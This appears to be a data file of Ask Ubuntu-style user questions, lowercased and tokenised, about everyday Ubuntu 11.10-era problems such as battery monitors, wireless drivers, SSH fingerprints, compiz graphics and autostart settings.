76256	lubuntu battery monitor always says 100 %	while using lubuntu-desktop i added the battery-monitor to the panel . it seems to be essentially useless as the only information i get from it is whether the power cable is plugged in or not because even while discharging the battery monitor always stays stuck at 100 % . i 've tried resetting the panel which does n't fix the problem . acpi gives the correct battery information . is there an alternate battery monitor or a work around for this ? my preference is to have something that works and displays the battery information on the panel . i can check my battery status on the command line but that does n't help if i just want a fast easy check . i 've tried conky but i ca n't get the $ { battery } command or anything related to that to display the information even though calling acpi from the command line gives the correct battery status . i could probably write something for conky to just parse and display the output of a call to acpi but i would much rather have a fix or alternative to the battery monitor in the panel .
76279	debootstrap - issue trying to start the network	i 've just installed ubuntu 11.10 under /var/chroot/oneiric following this tutorial . all seems to work properly , but unfortunatly i ca n't get the network working ... i 'd like to have a separate system to allow ssh login without access the real system ... i 've the following /etc/network/interfaces : # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback auto eth0 iface eth0 inet static address 192.168.1.4 netmask 255.255.255.0 gateway 192.168.1.1 but when i reboot the physical server , and even when i run sudo chroot /var/chroot/oneiric it does n't connect the network , i also ran sudo /etc/init.d/networking restart but all i got was being disconnected from the physical server ( i 'm using ssh ) . then i needed to reboot the real server . what am i missing ?
76291	how do i convert audiobooks from mp3 to m4b ?	i 've moved from windows to ubuntu and i have problems converting my new books ( in mp3 ) to m4b . there are a lot of windows applications which could do that , but what about ubuntu ?
76293	how to make sorted column background of nautilus list view brighter ?	i just installed ubuntu 11.10 ( i 've been using 10.10 before ) . first thing i changed in nautilus was to use list view instead of icon view . so it looks like this : please note the dark background of the name column , caused by the column being sorted . this , for me , is too dark . the most important information i want to browse through are the names of files and folders , and when it has such a low contrast it means it takes me longer to find the item i am looking for . so my question is : how can i make the background color of the name ( sorted ) column brighter , like how it was in ubuntu 10.10 ? also , where can i go to tell the ubuntu gui guys `` hey this is too dark '' ? i 've already quickly looked through /usr/share/themes/ambiance/gtk-3.0 but could not find the appropriate setting there .
76295	execute without ./ prefix	at my school 's linux cluster , its possible to run executables without the ./ prefix . however , on my home machines , i have to do this . i tried adding the code folder to the path via export path=/home/jason/code/ : $ path this worked when i wanted to have some custom scripts available for autocomplete , but the compiled executables are n't showing up . how can i set up my home machines to execute without the ./ prefix ?
76298	cheese wo n't run in framebuffer	when i try to run cheese from terminal i receive this error message : clutter-critical ** : unable to initialize clutter : unable to find suitable fbconfig for the glx context : unable to find fbconfig with rgba visual obviously , seems to be something about this fbconfig , that i presume is connected to framebuffer . my sis video card uses framebuffer to display 1280x800 maximum resolution . in previous versions i had used cheese without problems . someone can give me more light about this issue ?
76301	will adding more ram increase my computer 's performance ?	i am looking to increase my computer 's performance . will upgrading my ram by 12gb or upgrading to a 7,200 rpm hard drive increase my computer 's performance more ? i can only do one , which one will make my computer run faster ? please cite something in your answer for my own confidence . thanks !
76309	play a sound before or after grub loads	i got a cool sound from linux defender or knoppix ( or something else , i dont remember which one ) that says `` initiating start up sequence '' and i want to use it as early as i can in the boot process . having it say that when i login wouldnt make much sense , so having it play when grub starts would be best . can it be done ?
76310	broadcom b43 power management	i ca n't enable power management functions on my broadcom bcm4311 wlan card ( as sugested by powertop ) here are some prints : root @ grumpy : ~ # lspci -vnn | grep 14e4 0c:00.0 network controller [ 0280 ] : broadcom corporation bcm4311 802.11b/g wlan [ 14e4:4311 ] ( rev 01 ) root @ grumpy : ~ # iwconfig lo no wireless extensions . eth0 no wireless extensions . wlan0 ieee 802.11bg essid : off/any mode : managed access point : not-associated tx-power=20 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : off root @ grumpy : ~ # iwconfig wlan0 power on error for wireless request `` set power management '' ( 8b2c ) : set failed on device wlan0 ; operation not supported . the machine is dell d420 , running ubuntu 11.10 . i always had problems with my wifi driver and currently use the package firmware-b43-installer , and manually load the b43 module .
76312	how to synchronize files with ubuntu one automatically as soon as they are sent to the provided directory	how can i synchronize my files in the cloud with ubuntu one ? it used to be authomatic , but it does n't work anymore .
76313	how to keep ndiswrapper configuration after reboot ?	i 've been using ndiswrapper on my old wireless card without any problem , until i upgraded to ubuntu 11.10. ndiswrapper is not included by default anymore so i installed it from the software center , then i installed the driver using the .inf driver file . the wifi started to work just fine in all the system user accounts ( logging in & out was ok ) but after reboot , the wireless card just does n't work ( it does n't list any wireless connection ) and i have to open ndiswrapper ( gui ) and reinstall the .inf driver to make it work again . any ideas on how to solve this ? is it a `` daemon '' process or something that needs to be started after reboot that maybe is not being installed/configured by software center ?
76317	is there a way to escape to grub2 before system gets to the gui log in screen ?	after upgrading to 11.04 on a dell dimension e310 i can not login . my keyboard and mouse have locked up . i would like to escape to grub2 to allow me to investigate the problem i have . i can not even boot from a livecd or usb stick .
76323	ubuntu with windows safe ?	is it safe to run windows and ubuntu together on one pc ? will it `` mess with '' my computer ? i 'm using windows 7 . thanks !
76336	restore gfce ultra nes emulator after fullscreen	after hitting alt+enter the `` gfce ultra nes emulator '' goes fullscreen perfectly . however , restoring `` normal screen '' mode does n't get the screen resolution to go back to its original state . it remains on 640x480 px ( emulator fullscreen size ) . is there anyway to make it restore the screen fine by itself ? if not , any ideas on how to quickly `` manually '' restore the normal screen resolution ?
76337	where is the ssh server fingerprint generated/stored ?	i installed openssh-server and created a key with ssh-keygen . i then attempted to test it using local port forwarding by doing ssh -l 8080 : www.nytimes.com:80 127.0.0.1 . however , the key fingerprint that this command provides is not the key fingerprint i get when i do ssh-keygen -l. even if i delete my .ssh directory , i still get the same fingerprint , which is not the one i created with ssh-keygen . is there another key on my system ? where is this key ? how can i select this key for use by openssh-server ?
76338	saved passwords not being saved	so i installed kubuntu 11.10 on my thinkpad x201 laptop . i found that while it runs great , i 'm just not in love with the kde interface , so i 'll settle for the notorious unity . i insalled the entire ubuntu desktop with this command : sudo apt-get install ubuntu-desktop since then , network manager seems to remember which network is the one i want to connect to , but does n't save the passwords . when i open network manager to the edit connections window and check the wifi connections , i see each one that i 've saved . even if i update the password in there , they 're gone the next time . i 'm assuming the root cause is the same , but i see the same thing happen with passwords for some ssh-keys that i 've added to the system to access various unix systems in lieu of passwords . every time i connect , i get a popup asking me for the password , even though the first time , i specified to remember the passwd forever . anyone care to tell me how i can revive that functionality ? thanks
76340	compiz gaussian blur causes windows not to paint using intel 5700mhd graphics	i have a plain kubuntu/ubuntu ( by way of installing ubuntu-desktop ) on my thinkpad x201 laptop . it 's got a core i5 with the intel 5700mhd graphics . ubuntu 's run fine on it since i first purchased it , in the 10.04-ish era . mint also works fine . in all cases , i would generally use the same compiz profile which i 've created some time ago . one of the things it adds is blur for transparent windows using the gaussian blur effect . since unity has come along though ( i 'd say i was affected in natty , but i hardly ran unity on it , so i ca n't say for certain - definitely i 'm affected by this in oneiric ) i have n't been able to use blur anymore . mint lmde using latest everything , it worked fine , but on oneiric , if i use the 4x bilinear blur , the images are all inverted ( once horizontally , and again vertically ) . if i switch to gaussian blur , the windows are no longer `` painted '' on the screen , though parts appear if i mouse over them ... sometimes . any ideas why blur is apparently no longer supported using unity on intel 5700mhd graphics ? i have n't tried using the ubuntu x-swat ppa for bleeding edge drivers , because i use this laptop for various important tasks while mobile , so i do n't want to enable any unrecommended/unstable ppa 's . here is the output of glxinfo , after installing mesa-utils , as well as the output of lshw : sandro @ pocketrocket : ~ $ sudo lshw -c display *-display description : vga compatible controller product : core processor integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 02 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:42 memory : f2000000-f23fffff memory : d0000000-dfffffff ioport:1800 ( size=8 ) sandro @ pocketrocket : ~ $ glxinfo name of display : :0.0 display : :0 screen : 0 direct rendering : yes server glx vendor string : sgi server glx version string : 1.4 server glx extensions : glx_arb_multisample , glx_ext_import_context , glx_ext_texture_from_pixmap , glx_ext_visual_info , glx_ext_visual_rating , glx_mesa_copy_sub_buffer , glx_oml_swap_method , glx_sgi_make_current_read , glx_sgi_swap_control , glx_sgis_multisample , glx_sgix_fbconfig , glx_sgix_pbuffer , glx_sgix_visual_select_group , glx_intel_swap_event client glx vendor string : mesa project and sgi client glx version string : 1.4 client glx extensions : glx_arb_get_proc_address , glx_arb_multisample , glx_ext_import_context , glx_ext_visual_info , glx_ext_visual_rating , glx_ext_framebuffer_srgb , glx_mesa_copy_sub_buffer , glx_mesa_multithread_makecurrent , glx_mesa_swap_control , glx_oml_swap_method , glx_oml_sync_control , glx_sgi_make_current_read , glx_sgi_swap_control , glx_sgi_video_sync , glx_sgis_multisample , glx_sgix_fbconfig , glx_sgix_pbuffer , glx_sgix_visual_select_group , glx_ext_texture_from_pixmap , glx_intel_swap_event glx version : 1.4 glx extensions : glx_arb_get_proc_address , glx_arb_multisample , glx_ext_import_context , glx_ext_visual_info , glx_ext_visual_rating , glx_mesa_copy_sub_buffer , glx_mesa_multithread_makecurrent , glx_mesa_swap_control , glx_oml_swap_method , glx_oml_sync_control , glx_sgi_make_current_read , glx_sgi_swap_control , glx_sgi_video_sync , glx_sgis_multisample , glx_sgix_fbconfig , glx_sgix_pbuffer , glx_sgix_visual_select_group , glx_ext_texture_from_pixmap , glx_intel_swap_event opengl vendor string : tungsten graphics , inc opengl renderer string : mesa dri intel ( r ) ironlake mobile opengl version string : 2.1 mesa 7.11 opengl shading language version string : 1.20 opengl extensions : gl_arb_multisample , gl_ext_abgr , gl_ext_bgra , gl_ext_blend_color , gl_ext_blend_logic_op , gl_ext_blend_minmax , gl_ext_blend_subtract , gl_ext_copy_texture , gl_ext_polygon_offset , gl_ext_subtexture , gl_ext_texture_object , gl_ext_vertex_array , gl_ext_compiled_vertex_array , gl_ext_texture , gl_ext_texture3d , gl_ibm_rasterpos_clip , gl_arb_point_parameters , gl_ext_draw_range_elements , gl_ext_packed_pixels , gl_ext_point_parameters , gl_ext_rescale_normal , gl_ext_separate_specular_color , gl_ext_texture_edge_clamp , gl_sgis_generate_mipmap , gl_sgis_texture_border_clamp , gl_sgis_texture_edge_clamp , gl_sgis_texture_lod , gl_arb_framebuffer_srgb , gl_arb_multitexture , gl_ext_framebuffer_srgb , gl_ibm_multimode_draw_arrays , gl_ibm_texture_mirrored_repeat , gl_3dfx_texture_compression_fxt1 , gl_arb_texture_cube_map , gl_arb_texture_env_add , gl_arb_transpose_matrix , gl_ext_blend_func_separate , gl_ext_fog_coord , gl_ext_multi_draw_arrays , gl_ext_secondary_color , gl_ext_texture_env_add , gl_ext_texture_filter_anisotropic , gl_ext_texture_lod_bias , gl_ingr_blend_func_separate , gl_nv_blend_square , gl_nv_light_max_exponent , gl_nv_texgen_reflection , gl_nv_texture_env_combine4 , gl_sun_multi_draw_arrays , gl_arb_texture_border_clamp , gl_arb_texture_compression , gl_ext_framebuffer_object , gl_ext_texture_env_dot3 , gl_mesa_window_pos , gl_nv_packed_depth_stencil , gl_nv_texture_rectangle , gl_nv_vertex_program , gl_arb_depth_texture , gl_arb_occlusion_query , gl_arb_shadow , gl_arb_texture_env_combine , gl_arb_texture_env_crossbar , gl_arb_texture_env_dot3 , gl_arb_texture_mirrored_repeat , gl_arb_window_pos , gl_ati_envmap_bumpmap , gl_ext_stencil_two_side , gl_ext_texture_cube_map , gl_nv_depth_clamp , gl_nv_vertex_program1_1 , gl_apple_client_storage , gl_apple_packed_pixels , gl_apple_vertex_array_object , gl_arb_draw_buffers , gl_arb_fragment_program , gl_arb_fragment_shader , gl_arb_shader_objects , gl_arb_vertex_program , gl_arb_vertex_shader , gl_ati_draw_buffers , gl_ati_texture_env_combine3 , gl_ext_shadow_funcs , gl_ext_stencil_wrap , gl_mesa_pack_invert , gl_mesa_ycbcr_texture , gl_arb_depth_clamp , gl_arb_fragment_program_shadow , gl_arb_half_float_pixel , gl_arb_point_sprite , gl_arb_shading_language_100 , gl_arb_sync , gl_arb_texture_non_power_of_two , gl_arb_vertex_buffer_object , gl_ati_blend_equation_separate , gl_ext_blend_equation_separate , gl_oes_read_format , gl_arb_color_buffer_float , gl_arb_pixel_buffer_object , gl_arb_texture_compression_rgtc , gl_arb_texture_rectangle , gl_ext_pixel_buffer_object , gl_ext_texture_compression_rgtc , gl_ext_texture_rectangle , gl_ext_texture_srgb , gl_arb_framebuffer_object , gl_ext_framebuffer_blit , gl_ext_framebuffer_multisample , gl_ext_packed_depth_stencil , gl_apple_object_purgeable , gl_arb_vertex_array_object , gl_ati_separate_stencil , gl_ext_draw_buffers2 , gl_ext_gpu_program_parameters , gl_ext_texture_env_combine , gl_ext_texture_srgb_decode , gl_ext_timer_query , gl_oes_egl_image , gl_arb_copy_buffer , gl_arb_half_float_vertex , gl_arb_map_buffer_range , gl_arb_texture_rg , gl_arb_texture_swizzle , gl_arb_vertex_array_bgra , gl_ext_separate_shader_objects , gl_ext_texture_swizzle , gl_ext_vertex_array_bgra , gl_nv_conditional_render , gl_arb_es2_compatibility , gl_arb_draw_elements_base_vertex , gl_arb_explicit_attrib_location , gl_arb_fragment_coord_conventions , gl_arb_provoking_vertex , gl_arb_sampler_objects , gl_arb_seamless_cube_map , gl_arb_shader_texture_lod , gl_ext_provoking_vertex , gl_ext_texture_snorm , gl_mesa_texture_signed_rgba , gl_arb_robustness 32 glx visuals visual x bf lv rg d st colorbuffer sr ax dp st accumbuffer ms cav id dep cl sp sz l ci b ro r g b a f gb bf th cl r g b a ns b eat -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 0x021 24 tc 0 32 0 r y . 8 8 8 8 . . 0 24 8 0 0 0 0 0 0 none 0x022 24 dc 0 32 0 r y . 8 8 8 8 . . 0 24 8 0 0 0 0 0 0 none 0x08f 24 tc 0 24 0 r . . 8 8 8 0 . . 0 0 0 0 0 0 0 0 0 none 0x090 24 tc 0 24 0 r y . 8 8 8 0 . . 0 0 0 0 0 0 0 0 0 none 0x091 24 tc 0 24 0 r y . 8 8 8 0 . . 0 0 0 0 0 0 0 0 0 none 0x092 24 tc 0 24 0 r . . 8 8 8 0 . . 0 24 8 0 0 0 0 0 0 none 0x093 24 tc 0 24 0 r y . 8 8 8 0 . . 0 24 8 0 0 0 0 0 0 none 0x094 24 tc 0 24 0 r y . 8 8 8 0 . . 0 24 8 0 0 0 0 0 0 none 0x095 24 tc 0 32 0 r . . 8 8 8 8 . . 0 0 0 0 0 0 0 0 0 none 0x096 24 tc 0 32 0 r y . 8 8 8 8 . . 0 0 0 0 0 0 0 0 0 none 0x097 24 tc 0 32 0 r y . 8 8 8 8 . . 0 0 0 0 0 0 0 0 0 none 0x098 24 tc 0 32 0 r . . 8 8 8 8 . . 0 24 8 0 0 0 0 0 0 none 0x099 24 tc 0 24 0 r y . 8 8 8 0 . . 0 24 8 0 0 0 0 0 0 none 0x09a 24 tc 0 24 0 r y . 8 8 8 0 . . 0 24 8 16 16 16 0 0 0 slow 0x09b 24 tc 0 32 0 r y . 8 8 8 8 . . 0 24 8 0 0 0 0 0 0 none 0x09c 24 tc 0 32 0 r y . 8 8 8 8 . . 0 24 8 16 16 16 16 0 0 slow 0x09d 24 dc 0 24 0 r . . 8 8 8 0 . . 0 0 0 0 0 0 0 0 0 none 0x09e 24 dc 0 24 0 r y . 8 8 8 0 . . 0 0 0 0 0 0 0 0 0 none 0x09f 24 dc 0 24 0 r y . 8 8 8 0 . . 0 0 0 0 0 0 0 0 0 none 0x0a0 24 dc 0 24 0 r . . 8 8 8 0 . . 0 24 8 0 0 0 0 0 0 none 0x0a1 24 dc 0 24 0 r y . 8 8 8 0 . . 0 24 8 0 0 0 0 0 0 none 0x0a2 24 dc 0 24 0 r y . 8 8 8 0 . . 0 24 8 0 0 0 0 0 0 none 0x0a3 24 dc 0 32 0 r . . 8 8 8 8 . . 0 0 0 0 0 0 0 0 0 none 0x0a4 24 dc 0 32 0 r y . 8 8 8 8 . . 0 0 0 0 0 0 0 0 0 none 0x0a5 24 dc 0 32 0 r y . 8 8 8 8 . . 0 0 0 0 0 0 0 0 0 none 0x0a6 24 dc 0 32 0 r . . 8 8 8 8 . . 0 24 8 0 0 0 0 0 0 none 0x0a7 24 dc 0 32 0 r y . 8 8 8 8 . . 0 24 8 0 0 0 0 0 0 none 0x0a8 24 dc 0 24 0 r y . 8 8 8 0 . . 0 24 8 0 0 0 0 0 0 none 0x0a9 24 dc 0 24 0 r y . 8 8 8 0 . . 0 24 8 16 16 16 0 0 0 slow 0x0aa 24 dc 0 32 0 r y . 8 8 8 8 . . 0 24 8 0 0 0 0 0 0 none 0x0ab 24 dc 0 32 0 r y . 8 8 8 8 . . 0 24 8 16 16 16 16 0 0 slow 0x05e 32 tc 0 32 0 r y . 8 8 8 8 . . 0 24 8 0 0 0 0 0 0 none 48 glxfbconfigs : visual x bf lv rg d st colorbuffer sr ax dp st accumbuffer ms cav id dep cl sp sz l ci b ro r g b a f gb bf th cl r g b a ns b eat -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 0x05f 0 tc 0 16 0 r . . 5 6 5 0 . . 0 0 0 0 0 0 0 0 0 none 0x060 0 tc 0 16 0 r y . 5 6 5 0 . . 0 0 0 0 0 0 0 0 0 none 0x061 0 tc 0 16 0 r y . 5 6 5 0 . . 0 0 0 0 0 0 0 0 0 none 0x062 0 tc 0 16 0 r . . 5 6 5 0 . . 0 16 0 0 0 0 0 0 0 none 0x063 0 tc 0 16 0 r y . 5 6 5 0 . . 0 16 0 0 0 0 0 0 0 none 0x064 0 tc 0 16 0 r y . 5 6 5 0 . . 0 16 0 0 0 0 0 0 0 none 0x065 24 tc 0 24 0 r . . 8 8 8 0 . . 0 0 0 0 0 0 0 0 0 none 0x066 24 tc 0 24 0 r y . 8 8 8 0 . . 0 0 0 0 0 0 0 0 0 none 0x067 24 tc 0 24 0 r y . 8 8 8 0 . . 0 0 0 0 0 0 0 0 0 none 0x068 24 tc 0 24 0 r . . 8 8 8 0 . . 0 24 8 0 0 0 0 0 0 none 0x069 24 tc 0 24 0 r y . 8 8 8 0 . . 0 24 8 0 0 0 0 0 0 none 0x06a 24 tc 0 24 0 r y . 8 8 8 0 . . 0 24 8 0 0 0 0 0 0 none 0x06b 24 tc 0 32 0 r . . 8 8 8 8 . . 0 0 0 0 0 0 0 0 0 none 0x06c 24 tc 0 32 0 r y . 8 8 8 8 . . 0 0 0 0 0 0 0 0 0 none 0x06d 24 tc 0 32 0 r y . 8 8 8 8 . . 0 0 0 0 0 0 0 0 0 none 0x06e 24 tc 0 32 0 r . . 8 8 8 8 . . 0 24 8 0 0 0 0 0 0 none 0x06f 24 tc 0 32 0 r y . 8 8 8 8 . . 0 24 8 0 0 0 0 0 0 none 0x070 32 tc 0 32 0 r y . 8 8 8 8 . . 0 24 8 0 0 0 0 0 0 none 0x071 0 tc 0 16 0 r y . 5 6 5 0 . . 0 16 0 0 0 0 0 0 0 none 0x072 0 tc 0 16 0 r y . 5 6 5 0 . . 0 16 0 16 16 16 0 0 0 slow 0x073 24 tc 0 24 0 r y . 8 8 8 0 . . 0 24 8 0 0 0 0 0 0 none 0x074 24 tc 0 24 0 r y . 8 8 8 0 . . 0 24 8 16 16 16 0 0 0 slow 0x075 24 tc 0 32 0 r y . 8 8 8 8 . . 0 24 8 0 0 0 0 0 0 none 0x076 24 tc 0 32 0 r y . 8 8 8 8 . . 0 24 8 16 16 16 16 0 0 slow 0x077 0 dc 0 16 0 r . . 5 6 5 0 . . 0 0 0 0 0 0 0 0 0 none 0x078 0 dc 0 16 0 r y . 5 6 5 0 . . 0 0 0 0 0 0 0 0 0 none 0x079 0 dc 0 16 0 r y . 5 6 5 0 . . 0 0 0 0 0 0 0 0 0 none 0x07a 0 dc 0 16 0 r . . 5 6 5 0 . . 0 16 0 0 0 0 0 0 0 none 0x07b 0 dc 0 16 0 r y . 5 6 5 0 . . 0 16 0 0 0 0 0 0 0 none 0x07c 0 dc 0 16 0 r y . 5 6 5 0 . . 0 16 0 0 0 0 0 0 0 none 0x07d 24 dc 0 24 0 r . . 8 8 8 0 . . 0 0 0 0 0 0 0 0 0 none 0x07e 24 dc 0 24 0 r y . 8 8 8 0 . . 0 0 0 0 0 0 0 0 0 none 0x07f 24 dc 0 24 0 r y . 8 8 8 0 . . 0 0 0 0 0 0 0 0 0 none 0x080 24 dc 0 24 0 r . . 8 8 8 0 . . 0 24 8 0 0 0 0 0 0 none 0x081 24 dc 0 24 0 r y . 8 8 8 0 . . 0 24 8 0 0 0 0 0 0 none 0x082 24 dc 0 24 0 r y . 8 8 8 0 . . 0 24 8 0 0 0 0 0 0 none 0x083 24 dc 0 32 0 r . . 8 8 8 8 . . 0 0 0 0 0 0 0 0 0 none 0x084 24 dc 0 32 0 r y . 8 8 8 8 . . 0 0 0 0 0 0 0 0 0 none 0x085 24 dc 0 32 0 r y . 8 8 8 8 . . 0 0 0 0 0 0 0 0 0 none 0x086 24 dc 0 32 0 r . . 8 8 8 8 . . 0 24 8 0 0 0 0 0 0 none 0x087 24 dc 0 32 0 r y . 8 8 8 8 . . 0 24 8 0 0 0 0 0 0 none 0x088 24 dc 0 32 0 r y . 8 8 8 8 . . 0 24 8 0 0 0 0 0 0 none 0x089 0 dc 0 16 0 r y . 5 6 5 0 . . 0 16 0 0 0 0 0 0 0 none 0x08a 0 dc 0 16 0 r y . 5 6 5 0 . . 0 16 0 16 16 16 0 0 0 slow 0x08b 24 dc 0 24 0 r y . 8 8 8 0 . . 0 24 8 0 0 0 0 0 0 none 0x08c 24 dc 0 24 0 r y . 8 8 8 0 . . 0 24 8 16 16 16 0 0 0 slow 0x08d 24 dc 0 32 0 r y . 8 8 8 8 . . 0 24 8 0 0 0 0 0 0 none 0x08e 24 dc 0 32 0 r y . 8 8 8 8 . . 0 24 8 16 16 16 16 0 0 slow
76342	how can i add a bash script to the unity launcher ?	i open my favourite ide ( phpstorm ) using a custom bash script . i would like to add the script to the unity launcher . i thought i could add it by clicking the `` keep in launcher '' option , and sure enough , the icon stays on the launcher after i close the app . but clicking the icon does n't reopen the ide - the launcher just sits there , flashing . when i relogin in , the launcher icon is gone . anyone got any ideas how i can make this work ?
76346	apps capable of mounting/unmounting cd/dvd images with multi-sector or protected format	what apps for ubuntu exist that can mount/unmount cd/dvd images . image formats like cue , bin , iso , nero format , etc ... needed features : emulate protected cd/dvd like daemon-tools mount multi-sector images converting other formats ( including multi-sector images ) to iso format . update - updated question to `` need the 3 features above instead of having them as optional '' . this 3 features are needed to be able to use images that have any of this features enable . for normal mounting/burning image apps you can see here : how can i graphically mount isos ? can i mount an iso without administrative privileges ? how burn or mount an iso file ?
76354	replace xfce power manager with gnome power manager	is there a way to `` swap-out '' the existing xfce power manager in a xubuntu install with the more common gnome power manager without breaking the install ? am having problems with the xfce power manager on a toshiba laptop ( wont suspend properly ) - whereas the gnome equivalent has always worked flawlessly in the past . so how does one then go about removing the xfce pm and replacing it with the gnome power manager module ? running xubuntu 11.10 64 bit edition .
76356	starcraft 2 installer : invisible buttons followed by stuck progress bar	this is my wine output . it appears i can click where the install button would be and it goes to the progress bar screen . the terran guy appears on the top but the progress bar never moves . any support on this ?
76381	ca n't add 10.04 computer to ubuntuone	no matter what i try clicking on ubuntuone within system > preferences , it will not trigger my browser to open a webpage that allows me to add this computer . please help . i have already gone thru the instructions for completely removing and reinstalling ubuntuone . i have checked the passwords and encryption keys program and there is no entry for https : //ubuntuone.com yadda yadda yadda . this is driving me nuts ! ! i am trying to convert over to ubuntuone from dropbox but if i ca n't even add this 10.04 computer i ca n't use ubuntuone .
76382	is there a way to disable the hardware on/off switch for the wireless interface ?	i have an hp 520 and is running the latest ubuntu 11.10 . the hardware works fine with ubuntu with one exception : the device has a hardware switch for turning the wifi on and off . every time the wi-fi is disabled through the hardware switch , i am unable to bring it on again . the message on the networking popup would be device not ready . what i am looking for is a way to disable the hardware switch altogether so that when users accidentally press the button , the wifi would not be disabled . there is no setting to disable the switch in the bios . hardware info from lspci -nn : 00:00.0 host bridge [ 0600 ] : intel corporation mobile 945gme express memory controller hub [ 8086:27ac ] ( rev 03 ) 00:02.0 vga compatible controller [ 0300 ] : intel corporation mobile 945gme express integrated graphics controller [ 8086:27ae ] ( rev 03 ) 00:02.1 display controller [ 0380 ] : intel corporation mobile 945gm/gms/gme , 943/940gml express integrated graphics controller [ 8086:27a6 ] ( rev 03 ) 00:1b.0 audio device [ 0403 ] : intel corporation n10/ich 7 family high definition audio controller [ 8086:27d8 ] ( rev 01 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation n10/ich 7 family pci express port 1 [ 8086:27d0 ] ( rev 01 ) 00:1c.1 pci bridge [ 0604 ] : intel corporation n10/ich 7 family pci express port 2 [ 8086:27d2 ] ( rev 01 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation n10/ich 7 family usb uhci controller # 1 [ 8086:27c8 ] ( rev 01 ) 00:1d.7 usb controller [ 0c03 ] : intel corporation n10/ich 7 family usb2 ehci controller [ 8086:27cc ] ( rev 01 ) 00:1e.0 pci bridge [ 0604 ] : intel corporation 82801 mobile pci bridge [ 8086:2448 ] ( rev e1 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation 82801gbm ( ich7-m ) lpc interface bridge [ 8086:27b9 ] ( rev 01 ) 00:1f.2 ide interface [ 0101 ] : intel corporation 82801gbm/ghm ( ich7 family ) sata ide controller [ 8086:27c4 ] ( rev 01 ) 02:06.0 cardbus bridge [ 0607 ] : ene technology inc cb1410 cardbus controller [ 1524:1410 ] ( rev 01 ) 02:08.0 ethernet controller [ 0200 ] : intel corporation 82562et/ez/gt/gz - pro/100 ve ( lom ) ethernet controller mobile [ 8086:1068 ] ( rev 01 ) 10:00.0 network controller [ 0280 ] : intel corporation pro/wireless 3945abg [ golan ] network connection [ 8086:4222 ] ( rev 02 ) the output from lsmod | grep iwl : iwl3945 73329 0 iwl_legacy 71499 1 iwl3945 mac80211 272785 2 iwl3945 , iwl_legacy cfg80211 172392 3 iwl3945 , iwl_legacy , mac80211
76385	do something when cd/dvd/blu-ray inserted	i have a headless 10.04 server with a bd drive . i 'd like to be able to insert a blu-ray or dvd into the drive and have the server immediately begin ripping it with makemkv/handbrake . basically , i need command line way to run some arbitrary script/program as soon as a disc is put in . most of my googling suggests that udev is the mechanism i should be able to use for this , but upon running sudo udevadm monitor -- kernel i find that no udev events are generated when i put in a disc ; only when i manually mount it . i 've also come across hal , but it appears that it a ) is now deprecated in favor of udev , and b ) gets all its events from udev anyway ( ? ) . nonetheless , i 've given it a try ( following this tutorial and replacing the author 's reference to `` dvdinsert '' with the path to a short python script which runs wall to notify me that it was called ) , and have been unable to get hal to run it when i put a cd in . i have n't figured out how to monitor hal events as with udev , so i 'm less sure that no events are actually happening -- the tutorial seems to suggest that they should . /var/log/syslog shows no complaints from hal , though something showed up there when my .fdi file was malformed , so i know that 's where hal is writing messages to . has anyone been able to get cd/dvd/bd insertion events ? failing that , any udev/hal debugging tips would be appreciated . thanks ! edit : after some more reading/experimenting , i 've got hal calling a script on cd insertion . the problem was that hal callouts can not take absolute paths in the config ( which i was doing ) ; the scripts must explicitly live in /usr/lib/hal/scripts or /usr/bin . i still have the problem , however , that hald does not run automatically at startup -- there does not seem to be anything hal-related in /etc/init.d . ( i 'm going to file a new question for that specific problem ) . assuming i can solve that , this could work in a pinch , but i still feel like it 's an ugly solution . hal is still deprecated/unsupported , slows down the machine , and i 'm not really sure what other things i might be screwing up by having it around in tandem with the new system . if anyone has a cleaner way to do this ( or a solution to the startup problem ) , i 'd love to hear it !
76398	is the sloppy windows focus not working as it should ?	i am using ubuntu 11.10 , with gnome3 . i installed gnome-tweak-tool , in the windows menu , i selected windowos focus mode : sloppy . i had never heard of it before but according to wikipedia sloppy focus means : the sloppyfocus model is a variant of the followfocus model . it allows input to continue to be collected by the last focused window when the mouse pointer is moved away from any window , such as over a menubar or desktop area . i activated it , and i ca n't see no clear difference with the mouse focus mode , even when i 'm typing on a text-box , it seems to completly grab focus of the other window ? my questions are : did i understand what the sloppy mode should do ? should i be able to continue writing even when the mouse is on another window ? why is it not working and how do i solve it ? thanks in advance .
76401	is it possible to install from a mounted ubuntu-11.10-desktop-i386.iso already downloaded to the desktop ?	i have a machine that seems to have some issues , and i would like to install directly from the iso image already on the hdd . i can not for some reason boot from a livecd nor from a usb stick . i attached the hdd to another machine and dumped the iso to the desktop and reinstalled to the machine with issues .
76402	how to edit autostart applications ?	how can i reach the ui to configure the autostart applications in ubuntu 11.10 ? please do n't tell me , i have to do it using the terminal or creating a starter on my own and please do n't tell me , it is gone !
76403	what is the easiest method to share files between windows and ubuntu ?	i have a windows 7 installed on my laptop . i installed virtualbox 4.1.4 with ubuntu 11.10 . now i want to be able to copy files from windows to ubuntu and vice versa . what is the easiest method to accomplish this ?
76404	how do i delete a folder generated by foremost ?	i used the foremost tool for data recovery . it was taking too long so i decided to quit it . i closed the terminal and now it has left some folders behind and they have a lock sign on them . i want to delete them because they are occupying about 100 gb of my hard drive . i ca n't delete them even by becoming root . sudo -s rmdir recoveredforemost i made that folder recoveredforemost to store recovered data ? how do i remove these folders ?
76406	i have an extra power icon in my menu bar . any idea why ?	it 's a notification area icon ( i 've set the systray whitelist to 'all ' . ) it 's completely superfluous , unresponsive , and appears not to be associated with any process i can find . removing the power indicator does not affect it . it appears in every icon theme .
